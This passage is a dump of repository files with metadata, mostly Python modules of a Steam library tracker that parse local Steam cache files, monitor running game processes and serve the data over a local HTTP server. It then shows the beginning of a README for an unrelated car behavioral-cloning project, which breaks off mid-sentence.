None:\n\t\t\t\t\tgamedata[appid][\"timeplayed\"] = hrs\n\t\t\t\thrs2wks = getval(game.find(\"hoursLast2Weeks\"), None)\n\t\t\t\tif hrs2wks is not None:\n\t\t\t\t\tgamedata[appid][\"timeplayed2wk\"] = hrs2wks\n\texcept:\n\t\tpass" }, { "alpha_fraction": 0.6271212100982666, "alphanum_fraction": 0.6409090757369995, "avg_line_length": 36.08427047729492, "blob_id": "b937c83d5d891c3e1969a036e5ad49eee335c54c", "content_id": "2ef32b27732c6d61a8db87dcab41cc29532bcdf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6600, "license_type": "no_license", "max_line_length": 167, "num_lines": 178, "path": "/loader/apppackages.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport time\nimport utils\n\ndef getappinfo(steamhome, logindata):\n\n\tlibrarydirs = {}\n\tlibrarydirs[steamhome[\"path\"]] = True\n\ttry:\n\t\tfor steamapp in utils.steamapps:\n\t\t\tlibraryvdf = utils.vdf.load(open(os.path.join(steamhome[\"path\"],steamapp,\"libraryfolders.vdf\")))\n\t\t\tif libraryvdf is not None and \"LibraryFolders\" in libraryvdf:\n\t\t\t\tfor folder in libraryvdf[\"LibraryFolders\"]:\n\t\t\t\t\tlibrarydirs[libraryvdf[\"LibraryFolders\"][\"1\"]] = True\n\texcept:\n\t\tpass\n\n\tdef checkinstalled(direxe):\n\t\tfor lib in librarydirs:\n\t\t\tfor steamapp in utils.steamapps:\n\t\t\t\texe = os.path.join(lib,steamapp,\"common\",direxe)\n\t\t\t\tif os.path.exists(exe):\n\t\t\t\t\treturn True\n\t\t\treturn None\n\n\tappinfo = {}\n\ttry:\n\t\tappinfofile = open(os.path.join(steamhome[\"path\"],'appcache','appinfo.vdf'), 'rb')\n\t\tappinfodata = appinfofile.read().decode(\"ISO-8859-1\")\n\t\tappinfofile.close()\n\n\t\tgames = re.compile(\"\\x02\\x00common\").split(appinfodata)\n\t\tappmatch = re.compile(\"\\x02gameid\\x00([\\s\\S]{3})\")\n\t\tfsplit = re.compile(\"\\x00[\\x01\\x02]\")\n\t\tesplit = re.compile(\"(?=\\x00\\x01executable(?=\\x00))\")\n\n\t\tfor game in games:\n\t\t\tgameid = appmatch.search(game)\n\t\t\tif gameid and gameid.group(1):\n\t\t\t\tappid = utils.getnum(gameid.group(1))\n\t\t\t\tfielddict = {}\n\t\t\t\tfields = game.split(chr(1))\n\t\t\t\tfor field in fields:\n\t\t\t\t\tvals = field.split(chr(0))\n\t\t\t\t\tif vals is not None and vals[0] is not None and vals[0] not in fielddict:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfielddict[vals[0]] = vals[1]\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass # probably an invalid key - ignore it\n\t\t\t\tappinfo[appid] = {\n\t\t\t\t\t\"name\": fielddict[\"name\"].encode(\"ISO-8859-1\"),\n\t\t\t\t \"type\": \"\"\n\t\t\t\t}\n\t\t\t\tif \"installdir\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"path\"] = fielddict[\"installdir\"]\n\t\t\t\tif \"dlcappid\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"isdlc\"] = True\n\t\t\t\tif \"type\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"type\"] = fielddict[\"type\"]\n\t\t\t\t\tif fielddict[\"type\"].upper() == \"DLC\":\n\t\t\t\t\t\tappinfo[appid][\"isdlc\"] = True\n\t\t\t\tif \"logo\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"logo\"] = \"http://cdn.akamai.steamstatic.com/steamcommunity/public/images/apps/\" + str(appid) + \"/\" + fielddict[\"logo\"] + \".jpg\"\n\t\t\t\tif \"installdir\" in fielddict:\n\t\t\t\t\texes = utils.zerowidthsplit(esplit, game)\n\t\t\t\t\texes.pop(0) # discard the leading bit\n\t\t\t\t\tfor e in exes:\n\t\t\t\t\t\texedata={}\n\t\t\t\t\t\texefields = fsplit.split(e)\n\t\t\t\t\t\tfor ef in exefields:\n\t\t\t\t\t\t\texevals = ef.split(chr(0))\n\t\t\t\t\t\t\tif exevals[0] is not None and exevals[0] not in exedata:\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\texedata[exevals[0]] = exevals[1]\n\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\tpass # probably an invalid key - ignore it\n\t\t\t\t\t\tif (\"oslist\" not in exedata or exedata[\"oslist\"] == steamhome[\"platform\"]) and (\"osarch\" not in exedata or exedata[\"osarch\"] == steamhome[\"platarch\"]):\n\t\t\t\t\t\t\tif os.path.isabs(exedata[\"executable\"]):\n\t\t\t\t\t\t\t\texedata[\"executable\"] = exedata[\"executable\"][1:]\n\t\t\t\t\t\t\tappinfo[appid][\"exe\"] = exedata[\"executable\"]\n\t\t\t\t\t\t\tif \"installdir\" in fielddict and \"executable\" in exedata:\n\t\t\t\t\t\t\t\tappinfo[appid][\"foundat\"] = os.path.join(fielddict[\"installdir\"],exedata[\"executable\"])\n\t\t\t\t\t\t\tif \"CheckGuid\" in fielddict:\n\t\t\t\t\t\t\t\tappinfo[appid][\"guid\"] = fielddict[\"CheckGuid\"]\n\t\t\t\t\t\t\tif \"checkguids\" in fielddict:\n\t\t\t\t\t\t\t\tappinfo[appid][\"guids\"] = fielddict[\"checkguids\"]\n\t\t\t\t\t\t\tbreak\n\texcept:\n\t\tpass\n\n\tpackageinfo = {}\n\ttry:\n\t\tpackageinfofile = open(os.path.join(steamhome[\"path\"],'appcache','packageinfo.vdf'), 'rb')\n\t\tpackageinfodata = packageinfofile.read().decode(\"ISO-8859-1\")\n\t\tpackageinfofile.close()\n\n\t\tpmatch = re.compile(\"PackageID\\x00([\\s\\S]{4})\\x02\")\n\t\tematch = re.compile(\"\\x02ExpiryTime\\x00([\\s\\S]{4})\")\n\t\tamatch = re.compile(\"\\x02.*?\\x00([\\s\\S]{3})\\x00\")\n\t\tpackages = utils.zerowidthsplit(re.compile(\"(?=\\x00appids)\"),packageinfodata)\n\n\t\tfor package in packages:\n\t\t\tpkgmatch = pmatch.search(package)\n\t\t\tif pkgmatch is not None:\n\t\t\t\tpkgid = utils.getnum(pkgmatch.group(1))\n\t\t\t\tpackageinfo[pkgid] = {\"name\": \"unknown\", \"appids\": {}}\n\t\t\t\ttry :\n\t\t\t\t\texpmatch = ematch.search(package)\n\t\t\t\t\tif expmatch is not None:\n\t\t\t\t\t\texptime = int(utils.getnum(expmatch.group(1)))\n\t\t\t\t\t\tif exptime is not None and exptime < time.time():\n\t\t\t\t\t\t\tpackageinfo[pkgid][\"expired\"] = True\n\t\t\t\texcept (RuntimeError, TypeError, NameError):\n\t\t\t\t\tpass\n\t\t\t\tappidkey = package[8:]\n\t\t\t\twhile appidkey[0:1] == chr(2):\n\t\t\t\t\tappmatch = amatch.match(appidkey)\n\t\t\t\t\tif appmatch is not None:\n\t\t\t\t\t\tappid = utils.getnum(appmatch.group(1))\n\t\t\t\t\t\tpackageinfo[pkgid][\"appids\"][appid] = True\n\t\t\t\t\t\tappidkey = appidkey[len(appmatch.group(0)):]\n\texcept:\n\t\tpass\n\n\tgamedb = {}\n\tfor package in logindata[\"configdata\"][\"UserLocalConfigStore\"][\"Licenses\"]:\n\t\tif package in packageinfo and \"expired\" not in packageinfo[package] and \"appids\" in packageinfo[package]:\n\t\t\tfor appid in packageinfo[package][\"appids\"]:\n\t\t\t\tif appid in appinfo:\n\t\t\t\t\tif appid not in gamedb:\n\t\t\t\t\t\tgamedb[appid] = {\n\t\t\t\t\t\t\t\"name\": appinfo[appid][\"name\"]\n\t\t\t\t\t\t}\n\t\t\t\t\tif \"logo\" in appinfo[appid]:\n\t\t\t\t\t\tgamedb[appid][\"gridimage\"] = appinfo[appid][\"logo\"]\n\t\t\t\t\tif \"packageid\" not in gamedb[appid] or int(gamedb[appid][\"packageid\"]) < int(package):\n\t\t\t\t\t\tgamedb[appid][\"data-packageid\"] = package\n\n\tgamelist = {}\n\tconf = {}\n\tif \"apps\" in logindata[\"configdata\"][\"UserLocalConfigStore\"][\"Software\"][\"Valve\"][\"Steam\"]:\n\t\tconf = logindata[\"configdata\"][\"UserLocalConfigStore\"][\"Software\"][\"Valve\"][\"Steam\"][\"apps\"]\n\tfor game in gamedb:\n\t\tif \"type\" in appinfo[game]:\n\t\t\tgametype = appinfo[game][\"type\"]\n\t\tif (\"data-packageid\" not in gamedb[game] or int(gamedb[game][\"data-packageid\"]) > 0) and (gametype == \"\" or gametype.upper() == \"GAME\" or gametype.upper() == \"DLC\"):\n\t\t\tconfdata = {\"LastPlayed\": 0}\n\t\t\tif game in conf:\n\t\t\t\tconfdata = utils.merge(confdata,conf[game])\n\t\t\ttags = \"\"\n\t\t\tif \"tags\" in confdata:\n\t\t\t\tfor tag in confdata[\"tags\"]:\n\t\t\t\t\ttags += \"::\" + confdata[\"tags\"][tag]\n\t\t\tif \"hidden\" in confdata:\n\t\t\t\ttags += \"::hidden\"\n\t\t\tdataattrs = {\n\t\t\t \"data-categories\": tags\n\t\t\t}\n\t\t\tif \"LastPlayed\" in confdata and int(confdata[\"LastPlayed\"]) >= 1200000000:\n\t\t\t\tdataattrs[\"data-lastplayed\"] = confdata[\"LastPlayed\"]\n\t\t\tif game in appinfo:\n\t\t\t\tif \"foundat\" in appinfo[game] and appinfo[game][\"foundat\"] is not None and checkinstalled(appinfo[game][\"foundat\"]):\n\t\t\t\t\tdataattrs[\"data-exe\"] = appinfo[game][\"exe\"]\n\t\t\t\t\tdataguids = \"\"\n\t\t\t\t\tif \"guid\" in appinfo[game]:\n\t\t\t\t\t\tdataguids = appinfo[game][\"guid\"]\n\t\t\t\t\tif \"guids\" in appinfo[game]:\n\t\t\t\t\t\tif dataguids:\n\t\t\t\t\t\t\tdataguids += \";\"\n\t\t\t\t\t\tdataguids += appinfo[game][\"guids\"]\n\t\t\t\t\tif dataguids != \"\":\n\t\t\t\t\t\tdataattrs[\"data-guids\"] = dataguids\n\t\t\t\tif \"isdlc\" in appinfo[game]:\n\t\t\t\t\tdataattrs[\"data-isdlc\"] = True\n\t\t\tgamelist[game] = utils.merge(gamedb[game],dataattrs)\n\n\treturn gamelist" }, { "alpha_fraction": 0.6438162326812744, "alphanum_fraction": 0.6579505205154419, "avg_line_length": 29.7608699798584, "blob_id": "0f1d60dc1a0e03f8ec4d113f1a26133422c37522", "content_id": "3a9d456918dd65ad9c86355d056a85b6c35df5f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1415, "license_type": "no_license", "max_line_length": 73, "num_lines": 46, "path": "/gamemon/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport platform\nimport subprocess\n\ndef checkprocs(gamedata,localdata):\n\tdef getprocesses():\n\t\tif platform.system().lower() == \"windows\":\n\t\t\treturn \"tasklist /nh\"\n\t\telif platform.system().lower() == \"linux\":\n\t\t\treturn [\"ps\",\"-eo\",\"command\"]\n\t\telse:\n\t\t\treturn False\n\n\tcmd = getprocesses()\n\tif cmd != False:\n\t\toutp = subprocess.check_output(cmd).lower()\n\telse:\n\t\treturn\n\n\tnow = time.time()\n\tfor game in localdata:\n\t\tlastseen = 0\n\t\tif \"lastseenrunning\" in gamedata[game]:\n\t\t\tlastseen = gamedata[game][\"lastseenrunning\"]\n\t\t\tdel gamedata[game][\"lastseenrunning\"]\n\t\texes = \"\"\n\t\tif \"data-exe\" in localdata[game]:\n\t\t\texes += localdata[game][\"data-exe\"] + \";\"\n\t\tif \"data-guids\" in localdata[game]:\n\t\t\texes += localdata[game][\"data-guids\"]\n\t\tfor exe in exes.split(\";\"):\n\t\t\tif exe and os.path.basename(exe).lower() in outp:\n\t\t\t\tif lastseen > 0:\n\t\t\t\t\truntime = 0\n\t\t\t\t\truntime2wk = 0\n\t\t\t\t\tif \"timeplayed\" in gamedata[game]:\n\t\t\t\t\t\truntime = float(gamedata[game][\"timeplayed\"])\n\t\t\t\t\tif \"timeplayed2wk\" in gamedata[game]:\n\t\t\t\t\t\truntime2wk = float(gamedata[game][\"timeplayed2wk\"])\n\t\t\t\t\ttimerun = min(.017,(now - lastseen)/60/60) # max of 1 min approx\n\t\t\t\t\tgamedata[game][\"timeplayed\"] = str(round(runtime + timerun,3))\n\t\t\t\t\tgamedata[game][\"timeplayed2wk\"] = str(round(runtime2wk + timerun,3))\n\t\t\t\t\tif game in localdata:\n\t\t\t\t\t\tlocaldata[game][\"data-lastplayed\"] = now\n\t\t\t\tgamedata[game][\"lastseenrunning\"] = now\n" }, { "alpha_fraction": 0.6490280628204346, "alphanum_fraction": 0.676025927066803, "avg_line_length": 31.508771896362305, "blob_id": "d0d8b3de991f149b03708c7dc4f708fcc194a81b", "content_id": "34548a85bdb7342b2b4e6e21ff95063edef0618d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1852, "license_type": "no_license", "max_line_length": 115, "num_lines": 57, "path": "/loader/shortcuts.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport zlib\nimport hashlib\nimport utils\n\ndef getshortcuts(steamhome,logindata):\n\tdef makescid(exe,appname):\n\t\tcrc = zlib.crc32(exe+appname)\n\t\tcrc = (crc | 0x80000000) & 0xffffffff\n\t\tcrch = ('%x' % crc) + \"02000000\"\n\t\treturn str(int(crch,base=16)) # back to decimal but as string not int\n\n\tgridimages = {}\n\tfor root, dirs, gridfiles in os.walk(os.path.join(steamhome[\"path\"],\"userdata\",logindata[\"dir\"],\"config\",\"grid\")):\n\t\tfor gridfile in gridfiles:\n\t\t\tscappid = os.path.splitext(gridfile)[0]\n\t\t\tgridimages[scappid] = os.path.join(root,gridfile)\n\n\tssplit = re.compile(\"\\x00\\x01appname[^\\x08]*\\x08\\x08\")\n\tksplit = re.compile(\"\\x00[\\x01\\x02]\\x00*\")\n\n\tshortcutdb = {}\n\ttry:\n\t\tshortcutfile = open(os.path.join(steamhome[\"path\"],\"userdata\",logindata[\"dir\"],\"config\",\"shortcuts.vdf\"))\n\t\tshortcutdata = shortcutfile.read().decode(\"UTF-8\")\n\t\tshortcuts = ssplit.findall(shortcutdata)\n\t\tshortcutvdf = {}\n\t\tfor shortcut in shortcuts:\n\t\t\tkvs = ksplit.split(shortcut)\n\t\t\tkeyvals = {}\n\t\t\tfor kv in kvs:\n\t\t\t\tkeyval = kv.split(chr(0))\n\t\t\t\tif (len(keyval) > 1):\n\t\t\t\t\tkeyvals[keyval[0]] = keyval[1]\n\t\t\tshortcutvdf[keyvals[\"appname\"]] = keyvals\n\t\t\t# Tags are NOT saved properly for shortcuts - so don't expect them to appear\n\n\t\tscdb = logindata[\"configdata\"][\"UserLocalConfigStore\"][\"shortcuts\"]\n\t\tfor sc in shortcutvdf:\n\t\t\tscut = shortcutvdf[sc]\n\t\t\tscappid = makescid(scut[\"exe\"],scut[\"appname\"])\n\t\t\tdataattrs = {\n\t\t\t \"name\": scut[\"appname\"],\n\t\t\t \"data-shortcut\": True\n\t\t\t}\n\t\t\tif \"exe\" in scut:\n\t\t\t\tdataattrs[\"data-exe\"] = utils.stripquotes(scut[\"exe\"])\n\t\t\t\tsha1 = hashlib.sha1(scut[\"exe\"])\n\t\t\t\tif sha1.hexdigest() in scdb:\n\t\t\t\t\tdataattrs[\"data-lastplayed\"] = scdb[sha1.hexdigest()][\"LastPlayed\"]\n\t\t\tif scappid in gridimages:\n\t\t\t\tdataattrs[\"gridimage\"] = gridimages[scappid]\n\t\t\tshortcutdb[scappid] = dataattrs\n\texcept:\n\t\tpass\n\treturn shortcutdb" }, { "alpha_fraction": 0.6952515840530396, "alphanum_fraction": 0.7037562131881714, "avg_line_length": 34.29999923706055, "blob_id": "e746abf7bbbc140c63629dcf8f5c0d2b4d081ea7", "content_id": "0e7805f3fc4bfaf53db542f68cf588e9f37202f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1411, "license_type": "no_license", "max_line_length": 77, "num_lines": 40, "path": "/server/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import SimpleHTTPServer\nimport SocketServer\nimport urlparse\nimport os\nimport utils\n\ndef runserver(serverhandler, serverstop):\n\tclass ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n\t\tdef do_GET(self):\n\t\t\tglobal serverstop\n\t\t\turl = urlparse.urlparse(self.path)\n\t\t\tqs = dict(urlparse.parse_qsl(url.query))\n\t\t\tfor path in serverhandler:\n\t\t\t\tif url.path.endswith(path):\n\t\t\t\t\tcontent,retval = serverhandler[path](qs)\n\t\t\t\t\tself.send_response(200)\n\t\t\t\t\tself.send_header('Content-Type', content)\n\t\t\t\t\tif content == \"text/csv\":\n\t\t\t\t\t\tself.send_header(\"Content-Disposition\",\"attachment;filename=games.csv\")\n\t\t\t\t\tself.end_headers()\n\t\t\t\t\tif \"callback\" in qs:\n\t\t\t\t\t\tretval = qs[\"callback\"] + \"(\" + retval + \")\"\n\t\t\t\t\tself.wfile.write(retval)\n\t\t\t\t\treturn\n\t\t\tSimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\t\t# def do_POST(self):\n\t\t\t# leng = int(self.headers.getheader('content-length'))\n\t\t\t# postvars = urlparse.parse_qs(self.rfile.read(leng), keep_blank_values=1)\n\t\t\t# self.send_response(200)\n\t\t\t# self.send_header('Content-Type', 'application/json')\n\t\t\t# self.end_headers()\n\t\t\t# self.wfile.write(json.dumps(gamedb))\n\t\tdef log_message(self, format, *args):\n\t\t\tutils.debuglog(\"%s - %s\\n\" % (self.log_date_time_string(),format%args))\n\n\tos.chdir(\"web\")\n\tSocketServer.TCPServer.allow_reuse_address = True\n\thttpd = SocketServer.TCPServer((\"\", 55555), ServerHandler)\n\twhile not serverstop:\n\t\thttpd.handle_request()" }, { "alpha_fraction": 0.7014061212539673, "alphanum_fraction": 0.7063689231872559, "avg_line_length": 32.58333206176758, "blob_id": "22d5bd6627307a8681dd7a7a3e98aa3a3d2aca92", "content_id": "d18a94d26cb089a4cbb5417513bea8c8c655ea26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1209, "license_type": "no_license", "max_line_length": 101, "num_lines": 36, "path": "/loader/locals.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "from loader import shortcuts, apppackages, purchased\nimport time\nimport os\nimport utils\n\ndef getlocals(steamhome, logindata, gamedata, localdata):\n\tlogindata[\"configdata\"] = {}\n\tfor root, subFolders, files in os.walk(os.path.join(steamhome[\"path\"],\"userdata\",logindata[\"dir\"])):\n\t\tfor file in files:\n\t\t\tif file.lower().endswith(\"config.vdf\"):\n\t\t\t\tvdfdata = utils.vdf.load(open(os.path.join(steamhome[\"path\"],\"userdata\",root,file)))\n\t\t\t\tlogindata[\"configdata\"] = utils.merge(logindata[\"configdata\"],vdfdata)\n\n\tdef getnewgamedata(appid, name):\n\t\tret = {\n\t\t\"appid\": appid,\n\t\t\"name\": name\n\t\t}\n\t\tif int(appid) <= 999999: # not a shortcut\n\t\t\tret[\"firstseen\"] = int(time.time())\n\t\treturn ret\n\n\tpurchaseddata = purchased.getpurchased(logindata)\n\n\tlocaldb = utils.merge(\n\t\tshortcuts.getshortcuts(steamhome, logindata),\n\t\tapppackages.getappinfo(steamhome, logindata)\n\t)\n\tlocaldata.clear()\n\tfor g in localdb:\n\t\tif \"data-isdlc\" not in localdb[g]:\n\t\t\tlocaldata[g] = localdb[g]\n\t\t\tif not g in gamedata:\n\t\t\t\tgamedata[g] = getnewgamedata(g, localdb[g][\"name\"])\n\t\t\tif \"data-packageid\" in localdb[g] and localdb[g][\"data-packageid\"] in purchaseddata:\n\t\t\t\tgamedata[g][\"firstseen\"] = purchaseddata[localdb[g][\"data-packageid\"]]\n" }, { "alpha_fraction": 0.722663164138794, "alphanum_fraction": 0.7297177910804749, "avg_line_length": 24.211111068725586, "blob_id": "214880d95e3d4f9a857efff2092c697b4c05eca4", "content_id": "4e4072d61cb71d1f5422a7f8cba1cdeb513752d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2268, "license_type": "no_license", "max_line_length": 107, "num_lines": 90, "path": "/pyst.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "from loader import steamhome, finduser, locals, onlineprofile, api, reviews\nfrom data import gamedb,optionsdb\nimport gamemon\nimport server\nimport json\nimport copy\nimport utils\n\nsteamhome = steamhome.getpath()\n\nlogindata = finduser.getuserconfig(steamhome)\n\ndbs = []\n\noptions = optionsdb.OptionsDB()\n\ngamedb = gamedb.GameDB()\ngamedata = gamedb.load(logindata)\ndbs.append(gamedata)\n\nlocaldata = {}\ndbs.append(localdata)\n\napidata = {}\ndbs.append(apidata)\n\ndef runupdate():\n\tif not localdata:\n\t\tutils.debuglog(\"Loading Local Game Database\")\n\t\tlocals.getlocals(steamhome, logindata, gamedata, localdata)\n\n\tif options.checkdue(\"profileloaded\",60*60):\n\t\tutils.debuglog(\"Loading Online Profile\")\n\t\tonlineprofile.getprofile(logindata, gamedata)\n\n\tif not apidata:\n\t\tapidata.clear()\n\t\tutils.debuglog(\"Loading Games API\")\n\t\tapi.getapi(logindata, gamedata, apidata)\n\n\tif options.checkdue(\"reviewsloaded\",60*60*24):\n\t\tutils.debuglog(\"Loading your Reviews\")\n\t\treviews.getreviews(logindata,gamedata)\n\n\tif options.get(\"rungamemon\"):\n\t\tutils.debuglog(\"Game Monitor Scanning\")\n\t\tgamemon.checkprocs(gamedata,localdata)\n\n\tutils.debuglog(\"Saving/Done\")\n\tgamedb.save()\n\nallstop = False\nthread = utils.RunAsync(allstop, runupdate, 60)\nthread.start()\n\ndef mkdumpdb():\n\tdumpdb = {\n\t\t\"name64\": logindata[\"id64\"],\n\t \"name\": logindata[\"dir\"],\n\t\t\"user\": logindata[\"name\"]\n\t}\n\tif \"avatar\" in logindata[\"configdata\"][\"UserLocalConfigStore\"][\"friends\"][logindata[\"dir\"]]:\n\t\tdumpdb[\"avatar\"] = logindata[\"configdata\"][\"UserLocalConfigStore\"][\"friends\"][logindata[\"dir\"]][\"avatar\"]\n\tdumpdb[\"gamelist\"] = {}\n\tfor db in dbs:\n\t\tdbo = copy.deepcopy(db)\n\t\tutils.merge(dumpdb[\"gamelist\"],dbo)\n\treturn dumpdb\ndef handlegames(qs):\n\tdumpdb = mkdumpdb()\n\treturn 'application/json',json.dumps(dumpdb)\ndef handlecsv(qs):\n\tdumpdb = mkdumpdb()\n\tcsv = utils.jsontocsv(dumpdb[\"gamelist\"])\n\treturn 'text/csv',\"\\n\".join(csv)\ndef handleoptions(qs):\n\treturn 'application/json',json.dumps(options.get())\ndef handlesetoptions(qs):\n\tif \"name\" in qs and \"value\" in qs:\n\t\toptions.set(qs[\"name\"],qs[\"value\"]==\"true\")\n\t\toptions.save()\n\treturn \"text/html\",\"OK\"\nserverhandler = {\n\t\"/games\": handlegames,\n\t\"/csvgames\": handlecsv,\n\t\"/options\": handleoptions,\n\t\"/setopt\": handlesetoptions\n}\n\nserver.runserver(serverhandler, allstop)" } ]
17
chenwade/CarND-Behavioral-Cloning-P3
https://github.com/chenwade/CarND-Behavioral-Cloning-P3
cbad8e0fd04e753724cc6dcc5079738250f8e4bb
f2b762937e72ca32257d254ec89039f277f3c51a
e252cc8f3a7f8db19f9d1cba101a195e75f653c4
refs/heads/master
2020-03-22T19:29:23.086796
2018-07-11T07:54:25
2018-07-11T07:54:25
140,532,402
0
0
MIT
2018-07-11T06:37:29
2018-07-09T15:46:54
2018-06-26T23:33:21
null
[ { "alpha_fraction": 0.7289564609527588, "alphanum_fraction": 0.758078932762146, "avg_line_length": 51.885135650634766, "blob_id": "a6953123ccfbdd4dfe7a074b2eadc8631d6c6ecb", "content_id": "ef5f3e1b4a1a49a7b0a2572eb19e22b4c50bbf56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7829, "license_type": "permissive", "max_line_length": 626, "num_lines": 148, "path": "/README.md", "repo_name": "chenwade/CarND-Behavioral-Cloning-P3", "src_encoding": "UTF-8", "text": "# **Behavioral Cloning** \n\nThis project mainly focuses on mimicing humans' driving behaviors via neural network and simulating it into the Game.\n\n---\n\n**Behavioral Cloning Project**\n\nThe goals / steps of this project are the following:\n\n* Use the simulator to collect data of humans' driving behaviors. It was generated by three different cameras (left, mid, right) embedded in the font of the car.\n* Construct a neural network in keras in order to solve the regression problem, which is by training the network to predict how much of the angle the car should shift.\n* Train and validate the model with a training and validation set.\n* Test that the model successfully drives around track one without leaving the road.\n\n\n[//]: # (Image References)\n\n[image1]: ./Images/cropped_img.jpg\n[image2]: ./Images/angle_data.png\n[image3]: ./Images/angle_data_boom.png\n[image5]: ./Images/boom.png\n[image6]: ./Autonomous_Mode.gif\n\n## Rubric Points\n### Here I will consider the [rubric points](https://review.udacity.com/#!/rubrics/432/view) individually and describe how I addressed each point in my implementation. \n\n---\n### Files Submitted & Code Quality\n\n#### 1. Submission includes all required files and can be used to run the simulator in autonomous mode\n\nMy project includes the following files:\n\n* model.py containing the script to create and train the model.\n* drive.py for driving the car in autonomous mode.\n* model.hdf5 containing a trained convolution neural network.\n* writeup_report.md or writeup_report.pdf summarizing the results.\n\n#### 2. Submission includes functional code\nUsing the Udacity provided simulator and my drive.py file, the car can be driven autonomously around the track by executing\n```sh\npython drive.py model.hdf5\n```\n\n#### 3. Submission code is usable and readable\n\nThe model.py file contains the code for training and saving the best weights of my convolution neural network. The file contains comments to show how each function works. And I have all functions compacted in the model.py.\n\n### Model Architecture and Training Strategy\n\n#### 1. An appropriate model architecture has been employed\n\nI was inspired by the paper [End to End Learning for Self-Driving Cars](https://arxiv.org/abs/1604.07316) from NVIDIA. And also I have modified the activation functions into 'ReLU' instead of 'ELU'.\n\nMy model has total nine layers. The first five layers are all convolutional layers and the rest of the four are fully-connected layers. Among the convolutional layers, the first three are convolved by 5x5 filters, and the other two are convolved by 3x3 filters. The number of filters are 24, 36, 48, 64, 64 respectively (model.py lines 99-103).\n\nThe other four fully-connected layers have their sizes 100, 50, 10, 1 respectively (model.py lines 105-108).\n\nAnd the difference between my network and network in the paper is the activation functions. I changed activations function of all convolutional layers (model.py lines 99-103).\n\n#### 2. Attempts to reduce overfitting in the model\n\nMy model only picks the best weights after training and validation.\n\nMy weights was put into the simulator to ensure there is no overfitting in the model.\n\n#### 3. Model parameter tuning\n\nMy model uses 'Adam' optimizer and it has such properties:\n```sh\nm_0 <- 0 (Initialize initial 1st moment vector)\nv_0 <- 0 (Initialize initial 2nd moment vector)\nt <- 0 (Initialize timestep)\n```\nThe update rule for variable with gradient g:\n```sh\nt <- t + 1\nlr_t <- learning_rate * sqrt(1 - beta2^t) / (1 - beta1^t)\n\nm_t <- beta1 * m_{t-1} + (1 - beta1) * g\nv_t <- beta2 * v_{t-1} + (1 - beta2) * g * g\nvariable <- variable - lr_t * m_t / (sqrt(v_t) + epsilon)\n```\nAlso, it has defult epsilon which is 1e-08 and its value of weight_decay is 0.0.\n\n#### 4. Appropriate training data\n\nBecause there are total three cameras embedded in the front of the car, I used all of them to generate proper data for training. For example, the simulator creates a file named 'driving_log.csv' which contains all three images' names (center, left, right) captured by three different cameras and those images are contained in the folder named '/IMG'. Besides, the 'driving_log.csv' contains the steering_angle, speed, throttle, brake_flag data. In this project I only used steering_angle as training label since the speed is controlled by the throttle and brake and its value affects nothing much but the GPU processing speed.\n\n### Model Architecture and Training Strategy\n\n#### 1. Visualizing the data & modifying it\n\nBefore training the network, we have to visualize the data, for example, images from three different angles.\n\n<p align=\"middle\">\n <img src=\"./Images/left_2018_07_04_11_40_44_134.jpg\" width=\"250\"/>\n <img src=\"./Images/center_2018_07_04_11_40_44_134.jpg\" width=\"250\"/>\n <img src=\"./Images/right_2018_07_04_11_40_44_134.jpg\" width=\"250\"/>\n</p>\n\nWe can see that the left image has shifted to left a little bit compared with the center image, so we have to add a correction into steering_angle before using the left image in training. So as to the right image, we have to minus a correction into steering_angle. And in our model, we set up the correction as 0.2.\n\nMeanwhile, for each of the training image, we have to get rid of redundant information in it. For example, the image has size 320x160 and the upper part of the image consists of redundant features, like trees, sky, hills. These features may disturb our network. So we crop out 50 pixels from the upper part and 20 pixels from the lower part and hence we have our final image resized into 320x90.\n\n<p align=\"middle\">\n <img src=\"./Images/cropped_img.jpg\" width=\"400\"/>\n</p>\n\n\n\n\n#### 2. Model Architecture\n\n\nAfter having visualized the images, we then see how the steering_angle looks like.\n\n![steering_angle][image2]\n\nThe steering_angle data has distributed around zero, which means that we have collect a good driving behavior data. However, due to the shape of track, which has more left corners than right corners, negative steering_angles appear more than positive ones. So we decide to flip the images and steering_angles in order to balance both side around zero point.\n\n![steering_angle after modified][image3]\n\n#### 3. Training Process & Results\n\n\nAfter that, we shuffle the image data into two parts, training data and validation data, with the ratio 8:2.\n\n#### 2. Model Architecture\n\n\nThe model is a hierachical network. The network takes input image as shape 320x90x3 and normalizes it in each channel. It means that for each channel (R, G, B), all entries in 320x90 matrix should be divided by 127.5 and then subtracted by 1. It makes value of all entries in matrix range from -1 to 1.\n\nNext, normalized images convolve 24, 36, 48 filters with kernel_size 5. And the stride for the first three convolutional layers is 2, while using 'valid' padding and 'ReLU' activation function. Then, feature maps convolve 64, 64 filters with kernel_size 3, while the stride is 1, 'valid' padding and 'ReLU' activation function.\n\nAfter that, we flatten the output of the last convolutional layer, which is a 8448x1 vector and put the vector consecutively into 100, 50, 10 fully-connected layers. Last, our network takes the 10x1 vector 